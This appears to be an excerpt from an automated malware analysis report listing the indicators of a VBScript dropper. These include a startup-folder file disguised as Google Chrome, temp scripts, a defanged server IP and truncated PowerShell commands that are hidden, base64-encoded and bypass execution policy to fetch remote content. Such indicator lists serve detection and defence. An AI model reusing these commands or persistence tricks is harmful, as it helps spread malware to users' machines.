Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ google chrome.vbs
- %TEMP%\xireiqknnznef.vbs
- %TEMP%\jdjgspx.vbs
- '10#.#2.249.67':80
- http://10#.#2.249.67/pics/BN1%C2%BE%E2%84%A2%20%C5%92%C5%92%20%E5%BD%A1%20%E5%BD%A1%20%20AAA%20%C2%B0%20%20%C5%92%20%20%20%E2%8B%9A%20%20%20%E2%95%A5%E2%84%A2%E2%95%B2%C2%B2%E2%8A%B9%E2%9D%9D%2...
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\Xireiqknnznef.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\Jdjgspx.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -enc JABDAHIAeQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAATQBzAHgAbQBsADIALgBYAE0ATABIAFQAVABQADsAJABDAHIAeQAuAG8AcABlAG4AKAAnAEcA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -enc JABDAHIAeQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAATQBzAHgAbQBsADIALgBYAE0ATABIAFQAVABQADsAJABDAHIAeQAuAG8AcABlAG4AKAAnAEcA...